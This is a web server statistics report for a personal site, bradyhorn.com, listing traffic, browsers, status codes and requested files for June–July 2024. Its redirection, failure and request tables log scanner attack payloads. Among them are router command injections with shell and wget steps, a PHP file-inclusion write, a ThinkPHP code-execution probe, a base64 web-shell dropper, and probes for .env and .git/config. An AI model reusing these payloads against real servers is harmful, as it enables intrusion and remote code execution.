Web Server Statistics for [Brady Horn dot Com]

Program started at Fri-26-Jul-2024 03:39.
Analysed requests from Thu-20-Jun-2024 00:01 to Fri-26-Jul-2024 00:00 (36.00 days).

General Summary

(Go To: Top: General Summary: Monthly Report: Daily Summary: Hourly Summary: Domain Report: Organisation Report: Host Failure Report: Referrer Report: Referring Site Report: Browser Summary: Operating System Report: Status Code Report: File Size Report: File Type Report: Directory Report: Redirection Report: Failure Report: Request Report)

This report contains overall statistics.

(Figures in parentheses refer to the 7-day period ending 26-Jul-2024 03:39).
Successful requests: 46,316 (9,102)
Average successful requests per day: 1,286 (1,300)
Successful requests for pages: 18,829 (4,183)
Average successful requests for pages per day: 523 (597)
Failed requests: 7,262 (1,712)
Redirected requests: 13,800 (3,207)
Distinct files requested: 3,625 (1,449)
Distinct hosts served: 6,301 (1,569)
Corrupt logfile lines: 55
Data transferred: 992.00 megabytes (185.21 megabytes)
Average data transferred per day: 27.56 megabytes (26.46 megabytes)

Monthly Report

(Go To: Top: General Summary: Monthly Report: Daily Summary: Hourly Summary: Domain Report: Organisation Report: Host Failure Report: Referrer Report: Referring Site Report: Browser Summary: Operating System Report: Status Code Report: File Size Report: File Type Report: Directory Report: Redirection Report: Failure Report: Request Report)

This report lists the activity in each month.

Each unit (+) represents 400 requests for pages or part thereof.

   month:  reqs: pages: 
--------: -----: -----: 
Jun 2024: 12243:  4284: +++++++++++
Jul 2024: 34073: 14545: +++++++++++++++++++++++++++++++++++++
Busiest month: Jul 2024 (14,545 requests for pages).

Daily Summary

(Go To: Top: General Summary: Monthly Report: Daily Summary: Hourly Summary: Domain Report: Organisation Report: Host Failure Report: Referrer Report: Referring Site Report: Browser Summary: Operating System Report: Status Code Report: File Size Report: File Type Report: Directory Report: Redirection Report: Failure Report: Request Report)

This report lists the total activity for each day of the week, summed over all the weeks in the report.

Each unit (+) represents 80 requests for pages or part thereof.

day: reqs: pages: 
---: ----: -----: 
Sun: 5755:  2503: ++++++++++++++++++++++++++++++++
Mon: 6488:  2793: +++++++++++++++++++++++++++++++++++
Tue: 6325:  2448: +++++++++++++++++++++++++++++++
Wed: 6406:  2488: ++++++++++++++++++++++++++++++++
Thu: 8312:  3179: ++++++++++++++++++++++++++++++++++++++++
Fri: 7411:  3300: ++++++++++++++++++++++++++++++++++++++++++
Sat: 5619:  2118: +++++++++++++++++++++++++++

Hourly Summary

(Go To: Top: General Summary: Monthly Report: Daily Summary: Hourly Summary: Domain Report: Organisation Report: Host Failure Report: Referrer Report: Referring Site Report: Browser Summary: Operating System Report: Status Code Report: File Size Report: File Type Report: Directory Report: Redirection Report: Failure Report: Request Report)

This report lists the total activity for each hour of the day, summed over all the days in the report.

Each unit (+) represents 50 requests for pages or part thereof.

hour: reqs: pages: 
----: ----: -----: 
   0: 2667:  1403: +++++++++++++++++++++++++++++
   1: 2421:   948: +++++++++++++++++++
   2: 2135:   787: ++++++++++++++++
   3: 1903:   812: +++++++++++++++++
   4: 1950:   973: ++++++++++++++++++++
   5: 1789:   693: ++++++++++++++
   6: 1703:   581: ++++++++++++
   7: 1974:   728: +++++++++++++++
   8: 1512:   467: ++++++++++
   9: 2989:  1936: +++++++++++++++++++++++++++++++++++++++
  10: 1385:   457: ++++++++++
  11: 2119:   948: +++++++++++++++++++
  12: 1893:   608: +++++++++++++
  13: 1651:   574: ++++++++++++
  14: 1951:   594: ++++++++++++
  15: 1556:   432: +++++++++
  16: 1312:   401: +++++++++
  17: 1678:   654: ++++++++++++++
  18: 2392:  1095: ++++++++++++++++++++++
  19: 1561:   578: ++++++++++++
  20: 1666:   627: +++++++++++++
  21: 2089:   983: ++++++++++++++++++++
  22: 2050:   799: ++++++++++++++++
  23: 1970:   751: ++++++++++++++++

Domain Report

(Go To: Top: General Summary: Monthly Report: Daily Summary: Hourly Summary: Domain Report: Organisation Report: Host Failure Report: Referrer Report: Referring Site Report: Browser Summary: Operating System Report: Status Code Report: File Size Report: File Type Report: Directory Report: Redirection Report: Failure Report: Request Report)

This report lists the countries of the computers which requested files.

Listing domains, sorted by the amount of traffic.

 reqs: %bytes: domain
-----: ------: ------
27687: 43.51%: .com (Commercial)
10568: 36.31%: [unresolved numerical addresses]
 2287:  5.23%: .ru (Russia)
 2723:  5.14%: [unknown domain]
  148:  2.81%: .cn (China)
 1280:  2.35%: .net (Networks)
  277:  2.17%: .cz (Czech Republic)
  633:  1.08%: .de (Germany)
   63:  0.62%: .io (British Indian Ocean Territory)
  422:  0.45%: .org (Non Profit Making Organisations)
   33:  0.06%: .us (United States)
   48:  0.05%: .nl (Netherlands)
   25:  0.05%: .at (Austria)
   23:  0.04%: .md (Moldova)
   39:  0.04%: .ca (Canada)
    2:  0.02%: .hu (Hungary)
   13:  0.01%: .biz (Businesses)
    8:  0.01%: .kz (Kazakhstan)
    7:  0.01%: .it (Italy)
    2:  0.01%: .edu (USA Higher Education)
    4:  0.01%: .ch (Switzerland)
    3:       : .in (India)
    4:       : .co (Colombia)
    4:       : .se (Sweden)
    2:       : .nz (New Zealand)
    3:       : .arpa (Arpanet)
    2:       : [domain not given]
    1:       : .uk (United Kingdom)
    1:       : .np (Nepal)
    1:       : .kh (Cambodia)
    1:       : .mx (Mexico)
    1:       : .no (Norway)
    1:       : .by (Belarus)

Organisation Report

(Go To: Top: General Summary: Monthly Report: Daily Summary: Hourly Summary: Domain Report: Organisation Report: Host Failure Report: Referrer Report: Referring Site Report: Browser Summary: Operating System Report: Status Code Report: File Size Report: File Type Report: Directory Report: Redirection Report: Failure Report: Request Report)

This report lists the organisations of the computers which requested files.

Listing the top 20 organisations by the number of requests, sorted by the number of requests.

 reqs: %bytes: organisation
-----: ------: ------------
11776:  9.00%: spectrum.com
 4035:  4.41%: amazonaws.com
 3928:  8.77%: petalsearch.com
 2723:  5.14%: [unknown domain]
 2180:  5.05%: hosted-by-vdsina.ru
 2016:  7.54%: 52
 1528:  3.65%: googlebot.com
 1405:  1.40%: 141.98
 1180:  2.33%: 216.244
 1096:  3.12%: duckduckgo.com
  733:  0.15%: ahrefs.com
  683:  0.39%: mj12bot.com
  658:  0.55%: webmeup.com
  580:  2.88%: googleusercontent.com
  525:  1.33%: sprious.com
  384:  0.86%: r00tbase.de
  286:  0.64%: sogou.com
  277:  2.17%: seznam.cz
  263:  0.31%: contaboserver.net
  246:  0.21%: semrush.com
 9814: 40.08%: [not listed: 577 organisations]

Host Failure Report

(Go To: Top: General Summary: Monthly Report: Daily Summary: Hourly Summary: Domain Report: Organisation Report: Host Failure Report: Referrer Report: Referring Site Report: Browser Summary: Operating System Report: Status Code Report: File Size Report: File Type Report: Directory Report: Redirection Report: Failure Report: Request Report)

This report lists the computers which encountered failed requests.

Listing the top 20 hosts by the number of failed requests, sorted by the number of failed requests.

reqs: host
----: ----
 125: hostglobal.plus
 100: 139-144-52-241.ip.linodeusercontent.com
  90: ec2-52-76-71-100.ap-southeast-1.compute.amazonaws.com
  47: host-185-231-155-169.hosted-by-vdsina.ru
  46: rnd.group-ib.com
  43: vmi1982438.contaboserver.net
  43: mirthful-request.aeza.network
5952: [not listed: 1,677 hosts]

Referrer Report

(Go To: Top: General Summary: Monthly Report: Daily Summary: Hourly Summary: Domain Report: Organisation Report: Host Failure Report: Referrer Report: Referring Site Report: Browser Summary: Operating System Report: Status Code Report: File Size Report: File Type Report: Directory Report: Redirection Report: Failure Report: Request Report)

This report lists the referrers (where people followed links from, or pages which included this site's images).

Listing referring URLs with at least 20 requests, sorted by the number of requests.

reqs: URL
----: ---
2001: https://bradyhorn.com/
  74:   https://bradyhorn.com/?C=D%3BO%3DA
1374: https://www.bradyhorn.com/
  94:   https://www.bradyhorn.com/?cPath=37_38_40
  25:   https://www.bradyhorn.com/?manufacturers_id=10
1047: https://www.bradyhorn.com/reports/bradyhorn/
 970: https://bradyhorn.com/lakeTemp4.html
 893: https://bradyhorn.com/reports/bradyhorn/
 844: http://www.bradyhorn.com/
 795: https://bradyhorn.com/contact23.shtml
 718: https://bradyhorn.com/whistler2008.shtml
 650: https://bradyhorn.com/reports/annhorn/
 279: https://www.bradyhorn.com/basement.shtml
 196: https://www.bradyhorn.com/reports/efishon/
 157: https://www.bradyhorn.com/reports/bradyhorn/index.html
 157: https://bradyhorn.com/reports/efishon/
 136: https://www.bradyhorn.com/contact.shtml
 131: https://www.bradyhorn.com/reports/maxhorn/
 123: https://www.bradyhorn.com/familyVacations2010.shtml
 112: https://www.bradyhorn.com/reports/bradyhorn
 108: http://www.bradyhorn.com/robots.txt
 103: https://www.bradyhorn.com/reports/annhorn/
  98: https://www.bradyhorn.com/contact23.shtml
  95: https://www.bradyhorn.com/css/fonts/
  65:   https://www.bradyhorn.com/css/fonts/?C=M%3BO%3DD
  89: http://bradyhorn.com/
  83: https://www.bradyhorn.com/fishing2009.shtml
  76: https://www.bradyhorn.com/flash
  19:   https://www.bradyhorn.com/flash?C=N%3BO%3DA
  13:   https://www.bradyhorn.com/flash?C=M%3BO%3DA
  75: https://www.bradyhorn.com/applet/
  39:   https://www.bradyhorn.com/applet/?C=D%3BO%3DD
  74: https://bradyhorn.com/css/fonts
  69:   https://bradyhorn.com/css/fonts?C=M%3BO%3DA
  74: https://www.bradyhorn.com/vacations.shtml
  72: https://www.bradyhorn.com/indexFlash.html
  72: https://bradyhorn.com/flash/
  12:   https://bradyhorn.com/flash/?C=D%3BO%3DA
  11:   https://bradyhorn.com/flash/?C=S%3BO%3DA
  67: https://bradyhorn.com/reports/horninc/
  67: https://bradyhorn.com/applet/
  43:   https://bradyhorn.com/applet/?C=N%3BO%3DD
  66: https://www.bradyhorn.com/bathroomRemodel.shtml
  65: https://bradyhorn.com/reports/maxhorn/
  64: https://www.bradyhorn.com/washington2010.shtml
  62: https://bradyhorn.com/r73/
  18:   https://bradyhorn.com/r73/?C=S;O=A
  57: https://bradyhorn.com/flash
  42:   https://bradyhorn.com/flash?C=S%3BO%3DA
  55: https://www.bradyhorn.com/cruise
  33:   https://www.bradyhorn.com/cruise?C=D%3BO%3DD
  15:   https://www.bradyhorn.com/cruise?C=D%3BO%3DA
  55: http://bradyhorn.com/robots.txt
  54: https://www.bradyhorn.com/steelheadPM2008.shtml
  50: https://www.bradyhorn.com/laundryCabinets.shtml
  49: https://bradyhorn.com/vacations.shtml
  47: https://www.bradyhorn.com/projects.shtml
  45: https://bradyhorn.com/cruise
  27:   https://bradyhorn.com/cruise?C=M%3BO%3DA
  14:   https://bradyhorn.com/cruise?C=M%3BO%3DD
  44: https://www.bradyhorn.com/whistler2008.shtml
  41: http://www.bradyhorn.com/favicon.ico
  41: http://www.bradyhorn.com/sitemap.xml
  40: https://bradyhorn.com/css
  35:   https://bradyhorn.com/css?C=S%3BO%3DD
  40: https://www.bradyhorn.com/cruise/
  15:   https://www.bradyhorn.com/cruise/?C=01fg4m
  40: https://bradyhorn.com/public_html
  21:   https://bradyhorn.com/public_html?C=N%3BO%3DD
  19:   https://bradyhorn.com/public_html?C=N%3BO%3DA
  39: https://bradyhorn.com/thunderTable.shtml
  37: https://www.bradyhorn.com/italia2011.shtml
  37: https://www.bradyhorn.com/css/
  37:   https://www.bradyhorn.com/css/?C=M%3BO%3DA
  36: https://www.bradyhorn.com/mainBathroomRemodel.shtml
  36: https://www.bradyhorn.com/efTemplate/css
  29:   https://www.bradyhorn.com/efTemplate/css?C=D%3BO%3DA
  35: https://bradyhorn.com/efTemplate/css
  10:   https://bradyhorn.com/efTemplate/css?C=N%3BO%3DD
  35: https://www.bradyhorn.com/public_html
  35:   https://www.bradyhorn.com/public_html?C=N%3BO%3DA
  35: https://www.bradyhorn.com/tigerSuite.shtml
  34: https://www.bradyhorn.com/r73
  26:   https://www.bradyhorn.com/r73?C=S%3BO%3DD
  33: https://www.bradyhorn.com/boston2012.shtml
  32: https://bradyhorn.com/css/
  31: https://bradyhorn.com/projects.shtml
  31: https://www.bradyhorn.com/efTemplate/img/
  25:   https://www.bradyhorn.com/efTemplate/img/?C=D%3BO%3DD
  30: https://www.bradyhorn.com/flash/
  30: https://bradyhorn.com/reports
  28: https://www.bradyhorn.com/reports/
  27: https://www.bradyhorn.com/reports/zacharyahorn/
  27: https://bradyhorn.com/fishing.shtml
  26: https://bradyhorn.com/reports/zacharyahorn/
  26: https://www.bradyhorn.com/cruise/compIntel/
  24: https://www.bradyhorn.com/fishing.shtml
  24: https://bradyhorn.com/reports/bradyhorn
  23: https://bradyhorn.com/fishing.html
  22: https://www.bradyhorn.com/salmonPM2008.shtml
  22: https://bradyhorn.com/cruise/compIntel/
  22:   https://bradyhorn.com/cruise/compIntel/?C=S%3BO%3DD
  22: https://bradyhorn.com/washington2010.shtml
  22: https://www.bradyhorn.com/events.shtml
  21: https://bradyhorn.com/familyVacations2010.shtml
  20: http://www.hornandassociatesinc.com/catalog/carhartt-m-10.html
  20: https://bradyhorn.com/boats.shtml
 837: [not listed: 294 URLs]

Referring Site Report

(Go To: Top: General Summary: Monthly Report: Daily Summary: Hourly Summary: Domain Report: Organisation Report: Host Failure Report: Referrer Report: Referring Site Report: Browser Summary: Operating System Report: Status Code Report: File Size Report: File Type Report: Directory Report: Redirection Report: Failure Report: Request Report)

This report lists which servers people followed links from.

Listing the top 30 referring sites by the number of requests, sorted by the number of requests.

reqs: site
----: ----
7378: https://bradyhorn.com/
5314: https://www.bradyhorn.com/
1087: http://www.bradyhorn.com/
 247: http://bradyhorn.com/
  54: http://www.hornandassociatesinc.com/
  14: https://www.google.com/
  10: https://profiplast.org/
   8: https://ekolog.org/
   8: https://smartwidgets.ru/
   7: http://baidu.com/
   7: https://zasorich.ru/
   6: http://courtlevel.com/
   6: http://www.courtlevel.com/
   6: https://www.pojisteni-cizincu.cz/
   6: https://tekhpomosh-msk.ru/
   6: https:///
   5: http://hornandassociatesinc.com/
   5: http://zacharyahorn.com/
   4: https://google.com/
   4: https://www.turbo-kros.ru/
   4: https://dzen.ru/
   3: https://cessnaclub.ru/
   3: https://megadarkmarket.xyz/
   3: https://sias-auto.ru/
   3: https://kineshemec.ru/
   3: https://moneyads.ru/
   3: https://rowe-av.ru/
  50: [not listed: 29 sites]

Browser Summary

(Go To: Top: General Summary: Monthly Report: Daily Summary: Hourly Summary: Domain Report: Organisation Report: Host Failure Report: Referrer Report: Referring Site Report: Browser Summary: Operating System Report: Status Code Report: File Size Report: File Type Report: Directory Report: Redirection Report: Failure Report: Request Report)

This report lists the vendors of visitors' browsers.

Listing the top 20 browsers by the number of requests, sorted by the number of requests.

 reqs: browser
-----: -------
13515: Chrome
 3170:   Chrome/70
  859:   Chrome/120
 1149:   Chrome/60
  451:   Chrome/124
 1445:   Chrome/125
  357:   Chrome/121
  236:   Chrome/5
  411:   Chrome/114
  425:   Chrome/122
  273:   Chrome/109
  253:   Chrome/103
  199:   Chrome/117
  191:   Chrome/96
  318:   Chrome/116
  438:   Chrome/126
  166:   Chrome/113
  155:   Chrome/107
  310:   Chrome/87
  260:   Chrome/86
  164:   Chrome/23
10366: Python-urllib
10366:   Python-urllib/2
 9464: Netscape (compatible)
 6239: Safari
 4293:   Safari/537
  852:   Safari/600
  801:   Safari/604
  222:   Safari/605
   18:   Safari/534
   15:   Safari/533
   22:   Safari/602
    6:   Safari/601
    2:   Safari/525
    1:   Safari/538
    1:   Safari/7046A194A
    1:   Safari/530
    1:   Safari/531
    1:   Safari/607
    1:   Safari/536
    1:   Safari/8614
    1:   Safari/8618
 1508: Firefox
  952:   Firefox/3
   50:   Firefox/115
   15:   Firefox/8
   16:   Firefox/118
   14:   Firefox/52
   28:   Firefox/114
   15:   Firefox/123
   18:   Firefox/73
    9:   Firefox/102
    8:   Firefox/124
    8:   Firefox/116
    8:   Firefox/55
    8:   Firefox/83
    7:   Firefox/109
    5:   Firefox/110
    5:   Firefox/126
    5:   Firefox/38
    4:   Firefox/9
    4:   Firefox/65
  240:   Firefox/72
 1088: 'DuckDuckBot-Https
 1088:   'DuckDuckBot-Https/1
 1061: Mozilla
  725:   Mozilla/1
    1:   Mozilla/38
  661: MSIE
  344:   MSIE/7
  211:   MSIE/8
   75:   MSIE/9
   22:   MSIE/10
    8:   MSIE/6
    1:   MSIE/5
  393: python-requests
  393:   python-requests/2
  292: Go-http-client
  292:   Go-http-client/1
  244: Opera
  241:   Opera/9
    2:   Opera/6
    1:   Opera/12
  206: Sogou web spider
  206:   Sogou web spider/4
  138: facebookexternalhit
  138:   facebookexternalhit/1
  124: Sidetrade indexer bot
  113: Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses
  113:   Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains
  112: curl
   91:   curl/7
   21:   curl/8
   73: Googlebot-Image
   73:   Googlebot-Image/1
   71: Python
   71:   Python/3
   47: Dalvik
   47:   Dalvik/2
   40: mozilla
   40:   mozilla/5
  273: [not listed: 42 browsers]

Operating System Report

(Go To: Top: General Summary: Monthly Report: Daily Summary: Hourly Summary: Domain Report: Organisation Report: Host Failure Report: Referrer Report: Referring Site Report: Browser Summary: Operating System Report: Status Code Report: File Size Report: File Type Report: Directory Report: Redirection Report: Failure Report: Request Report)

This report lists the operating systems used by visitors.

Listing operating systems, sorted by the number of requests for pages.

no.:  reqs: pages: OS
---: -----: -----: --
  1:  8795:  5308: Unix
   :  8787:  5304:   Linux
   :     7:     3:   Other Unix
   :     1:     1:   FreeBSD
  2:  7047:  4558: Windows
   :  4847:  3129:   Windows NT
   :  1309:   807:   Windows 7
   :   421:   331:   Windows XP
   :   359:   230:   Unknown Windows
   :    79:    39:   Windows 8
   :    17:    15:   Windows Server 2003
   :    10:     7:   Windows Vista
   :     1:     0:   Windows 98
   :     2:     0:   Windows 2000
   :     2:     0:   Windows 3.1
  3: 20743:  4308: OS unknown
  4:  3573:  2340: Macintosh
  5:  5868:  2061: Known robots
  6:     1:     1: OS/2
  7:     1:     1: Symbian OS

Status Code Report

(Go To: Top: General Summary: Monthly Report: Daily Summary: Hourly Summary: Domain Report: Organisation Report: Host Failure Report: Referrer Report: Referring Site Report: Browser Summary: Operating System Report: Status Code Report: File Size Report: File Type Report: Directory Report: Redirection Report: Failure Report: Request Report)

This report lists the HTTP status codes of all requests.

Listing status codes, sorted numerically.

 reqs: status code
-----: -----------
46049: 200 OK
13797: 301 Document moved permanently
    3: 302 Document found elsewhere
  267: 304 Not modified since last retrieval
 1977: 400 Bad request
 1182: 403 Access forbidden
 4019: 404 Document not found
   56: 408 Request timeout
   28: 500 Internal server error

File Size Report

(Go To: Top: General Summary: Monthly Report: Daily Summary: Hourly Summary: Domain Report: Organisation Report: Host Failure Report: Referrer Report: Referring Site Report: Browser Summary: Operating System Report: Status Code Report: File Size Report: File Type Report: Directory Report: Redirection Report: Failure Report: Request Report)

This report lists the sizes of files.

       size:  reqs: %bytes: 
-----------: -----: ------: 
          0:    27:       : 
   1B-  10B:     0:       : 
  11B- 100B:    26:       : 
 101B-  1kB:  2914:  0.12%: 
  1kB- 10kB: 27183: 16.59%: 
 10kB-100kB: 15192: 30.43%: 
100kB-  1MB:   795: 17.20%: 
  1MB- 10MB:   179: 35.66%: 

File Type Report

(Go To: Top: General Summary: Monthly Report: Daily Summary: Hourly Summary: Domain Report: Organisation Report: Host Failure Report: Referrer Report: Referring Site Report: Browser Summary: Operating System Report: Status Code Report: File Size Report: File Type Report: Directory Report: Redirection Report: Failure Report: Request Report)

This report lists the extensions of files.

Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.

 reqs: %bytes: extension
-----: ------: ---------
  213: 26.56%: .xml
 4051: 20.26%: .jpg  [JPEG graphics]
16188: 17.44%: [directories]
   47:  8.90%: .fla
11204:  6.73%: .php  [PHP]
  135:  6.00%: .JPG
 4597:  4.09%: .shtml [Server-parsed HTML]
 2694:  1.79%: .txt  [Plain text]
   98:  1.39%: .pdf  [Adobe Portable Document Format]
 2427:  1.17%: .html [Hypertext Markup Language]
  138:  1.00%: .swf
  672:  1.00%: .ico
    4:  0.76%: .wmv
 2137:  0.74%: .png  [PNG graphics]
   88:  0.41%: .ttf
   17:  0.39%: .mp3  [MP3 sound files]
   12:  0.27%: .wav  [WAV sound files]
   54:  0.18%: .woff
   47:  0.14%: .eot
   20:  0.13%: .svg
  214:  0.13%: .htm  [Hypertext Markup Language]
   27:  0.12%: .rm
 1232:  0.41%: [not listed: 14 extensions]

Directory Report

(Go To: Top: General Summary: Monthly Report: Daily Summary: Hourly Summary: Domain Report: Organisation Report: Host Failure Report: Referrer Report: Referring Site Report: Browser Summary: Operating System Report: Status Code Report: File Size Report: File Type Report: Directory Report: Redirection Report: Failure Report: Request Report)

This report lists the directories from which files were requested. (The figures for each directory include all of its subdirectories.)

Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.

 reqs: %bytes: directory
-----: ------: ---------
21907: 48.61%: [root directory]
 4169: 20.94%: /images/
  652: 10.82%: /flash/
11204:  6.73%: /st/
  451:  6.13%: /r73/
 3334:  3.61%: /reports/
 1223:  1.45%: /css/
  795:  0.47%: /public_html/
  597:  0.41%: /cruise/
  621:  0.31%: /efTemplate/
  452:  0.23%: /applet/
   77:  0.09%: /AMS/
   86:  0.09%: /wedding/
  145:  0.08%: /WEBALIZER_REPORTS/
  601:  0.03%: /icons/
    2:       : [not listed: 2 directories]

Redirection Report

(Go To: Top: General Summary: Monthly Report: Daily Summary: Hourly Summary: Domain Report: Organisation Report: Host Failure Report: Referrer Report: Referring Site Report: Browser Summary: Operating System Report: Status Code Report: File Size Report: File Type Report: Directory Report: Redirection Report: Failure Report: Request Report)

This report lists the files that caused requests to be redirected to another file. (Usually directories with the final slash missing, or CGI scripts that forced redirections.)

Listing the top 30 files by the number of redirected requests, sorted by the number of redirected requests.

reqs: file
----: ----
6139: /
  28:   /?XDEBUG_SESSION_START=phpstorm
  27:   /?manufacturers_id=10
  20:   /?manufacturers_id=21
  13:   /?manufacturers_id=10&filter_id=21&sort=4a
  13:   /?manufacturers_id=24
  11:   /?manufacturers_id=20
  10:   /?manufacturers_id=14
  10:   /?manufacturers_id=16
  10:   /?manufacturers_id=19
  10:   /?manufacturers_id=22
1532: /robots.txt
 228: /favicon.ico
 180: /contact.shtml
 162: /.env
 141: /ads.txt
  99: /sitemap.xml
  98: /flash
  14:   /flash?C=M%3BO%3DA
  12:   /flash?C=D%3BO%3DA
  11:   /flash?C=S%3BO%3DD
  10:   /flash?C=N%3BO%3DA
  10:   /flash?C=N%3BO%3DD
  10:   /flash?C=D%3BO%3DD
  97: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  95: /cruise
  13:   /cruise?C=D%3BO%3DA
  12:   /cruise?C=M%3BO%3DA
  12:   /cruise?C=M%3BO%3DD
  11:   /cruise?C=D%3BO%3DD
  10:   /cruise?C=N%3BO%3DD
  10:   /cruise?C=S%3BO%3DA
  86: /public_html
  14:   /public_html?C=N%3BO%3DA
  12:   /public_html?C=N%3BO%3DD
  10:   /public_html?C=M%3BO%3DA
  10:   /public_html?C=D%3BO%3DA
  10:   /public_html?C=S%3BO%3DD
  86: /css
  12:   /css?C=S%3BO%3DD
  10:   /css?C=N%3BO%3DD
  10:   /css?C=S%3BO%3DA
  86: /css/fonts
  13:   /css/fonts?C=N%3BO%3DD
  12:   /css/fonts?C=S%3BO%3DA
  12:   /css/fonts?C=S%3BO%3DD
  11:   /css/fonts?C=M%3BO%3DA
  11:   /css/fonts?C=M%3BO%3DD
  79: /cgi-bin/luci/
  38:   /cgi-bin/luci/?form=country&operation=write&country=$(id>`for+proc_dir+in+/proc/[0-9]*%3B+do+pid%3D${proc_dir##*/}%3B+buffer%3D$(cat+"/proc/$pid/maps")%3B+if+[+"${#buffer}"+-gt+1+]%3B+then+if+[+"${buffer#*"/lib/"}"+%3D+"$buffer"+]+%26%26+[+"${buffer#*"telnetdbot"}"+%3D+"$buffer"+]%3B+then+kill+-9+"$pid"%3B+fi%3B+fi%3B+done`)
  28:   /cgi-bin/luci/?form=country&operation=write&country=$(id>`cd+/tmp%3B+rm+-rf+r%3B+wget+`)
  78: /r73
  12:   /r73?C=S%3BO%3DD
  11:   /r73?C=N%3BO%3DD
  10:   /r73?C=S%3BO%3DA
  75: /applet
  12:   /applet?C=S%3BO%3DA
  11:   /applet?C=S%3BO%3DD
  11:   /applet?C=D%3BO%3DD
  11:   /applet?C=N%3BO%3DD
  10:   /applet?C=D%3BO%3DA
  71: /reports
  65: /solr/admin/info/system
  35:   /solr/admin/info/system?wt=json
  61: /reports/annhorn
  53: /efTemplate/css
  11:   /efTemplate/css?C=D%3BO%3DA
  10:   /efTemplate/css?C=N%3BO%3DD
  49: /reports/efishon
  46: /reports/bradyhorn
  44: /efTemplate/img
  10:   /efTemplate/img?C=N%3BO%3DD
  41: /wp-login.php
  39: /reports/maxhorn
  35: /Autodiscover/Autodiscover.xml
  35: /geoserver/web/
  34: /index_fr.html
  33: /boat.html
  32: /resume.pdf
3901: [not listed: 858 files]

Failure Report

(Go To: Top: General Summary: Monthly Report: Daily Summary: Hourly Summary: Domain Report: Organisation Report: Host Failure Report: Referrer Report: Referring Site Report: Browser Summary: Operating System Report: Status Code Report: File Size Report: File Type Report: Directory Report: Redirection Report: Failure Report: Request Report)

This report lists the files that caused failures, for example files not found.

Listing the top 30 files by the number of failed requests, sorted by the number of failed requests.

reqs: file
----: ----
1119: /contact23.shtml
 973: /x16/x03/x01
 322: /
 250: /contact.shtml
 188: /ads.txt
 178: /.env
 171: *
 128: /.git/config
 115: /n
 109: /css/cellHandler.do
  16:   /css/cellHandler.do?cellId=182970&refDoc=3240161&from=sm
  15:   /css/cellHandler.do?cellId=220710&refDoc=3240161&from=sm
  15:   /css/cellHandler.do?cellId=183021&refDoc=3240161&from=sm
  15:   /css/cellHandler.do?cellId=224870&refDoc=3240161&from=sm
  11:   /css/cellHandler.do?cellId=182970&=3240161
  10:   /css/cellHandler.do?cellId=220710&=3240161
  59: /wp-login.php
  59: /cgi-sys/Count.cgi
  57:   /cgi-sys/Count.cgi?df=bchorn-bradyhorn|ft=0|dd=C|tr=y
  54: /index.php
  16:   /index.php?lang=../../../../../../../../tmp/index1
  16:   /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\"hi\"));?>+/tmp/index1.php
  16:   /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
  52: /x16/x03/x01/x01/b/x01
  48: /x03
  47: /catch_photos/
  47: /x16/x03/x02/x01o/x01
  45: /x16/x03/x01/x02
  42: /bass/
  41: /bin/sh
  39: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  38: /dns-query
  37: /css/showTif.do
  20:   /css/showTif.do?image=2740519
  17:   /css/showTif.do?image=2740520
  36: /cgi-bin/%2ee2e/e2ee2e/e2ee2e/e2ee2e/e2ee2e/e2ee2e/e2ee2e/bin/sh
  32: /geoserver/web/
  29: /" + link + "
  27: /_profiler/phpinfo
  27: /robots.txt
  25: /x16/x03/x01/x01/xfb/x01
  23: /xmlrpc.php
2830: [not listed: 744 files]

Request Report

(Go To: Top: General Summary: Monthly Report: Daily Summary: Hourly Summary: Domain Report: Organisation Report: Host Failure Report: Referrer Report: Referring Site Report: Browser Summary: Operating System Report: Status Code Report: File Size Report: File Type Report: Directory Report: Redirection Report: Failure Report: Request Report)

This report lists the files on the site.

Listing files with at least 20 requests, sorted by the number of requests.

 reqs: %bytes:       last time: file
-----: ------: ---------------: ----
11203:  6.73%: 26/Jul/24 00:00: /st/st9.php
10842: 12.36%: 26/Jul/24 00:00: /
   61:  0.05%: 25/Jul/24 17:50:   /?manufacturers_id=10
   45:  0.04%: 25/Jul/24 23:31:   /?XDEBUG_SESSION_START=phpstorm
   42:  0.03%: 25/Jul/24 04:27:   /?manufacturers_id=16
   38:  0.04%: 25/Jul/24 21:56:   /?cPath=37_27
   37:  0.03%: 25/Jul/24 09:30:   /?manufacturers_id=10&filter_id=21&sort=4a
   35:  0.03%: 25/Jul/24 05:57:   /?manufacturers_id=20
   34:  0.03%: 25/Jul/24 12:23:   /?manufacturers_id=21
   34:  0.03%: 24/Jul/24 07:50:   /?manufacturers_id=24
   33:  0.03%: 24/Jul/24 07:22:   /?manufacturers_id=19
   32:  0.03%: 24/Jul/24 07:20:   /?manufacturers_id=14
   32:  0.02%: 24/Jul/24 15:06:   /?manufacturers_id=22
   32:  0.03%: 25/Jul/24 05:14:   /?filter_id=21&manufacturers_id=10&sort=4a
   30:  0.03%: 24/Jul/24 07:18:   /?manufacturers_id=33&sort=1a&page=1
   30:  0.03%: 25/Jul/24 22:29:   /?author=2
   29:  0.02%: 24/Jul/24 07:23:   /?author=15
   29:  0.02%: 25/Jul/24 07:40:   /?cPath=37_38_39_23
   29:  0.03%: 24/Jul/24 07:20:   /?1=@ini_set("display_errors","0")%3B@set_time_limit(0)%3B@set_magic_quotes_runtime(0)%3Becho '->|'%3Bfile_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'))%3Becho '|<-'%3B
   29:  0.03%: 24/Jul/24 12:14:   /?cPath=37_38_40_25_32
   28:  0.02%: 25/Jul/24 10:25:   /?manufacturers_id=10&filter_id=24&sort=4a
   28:  0.02%: 25/Jul/24 05:11:   /?cPath=37_38
   28:  0.03%: 25/Jul/24 11:29:   /?cPath=37_38_40_25_34&products_id=499&action=buy_now&sort=4a
   27:  0.03%: 25/Jul/24 14:20:   /?cPath=25_34&sort=2a&page=1
   27:  0.02%: 25/Jul/24 01:25:   /?cPath=37_27_36
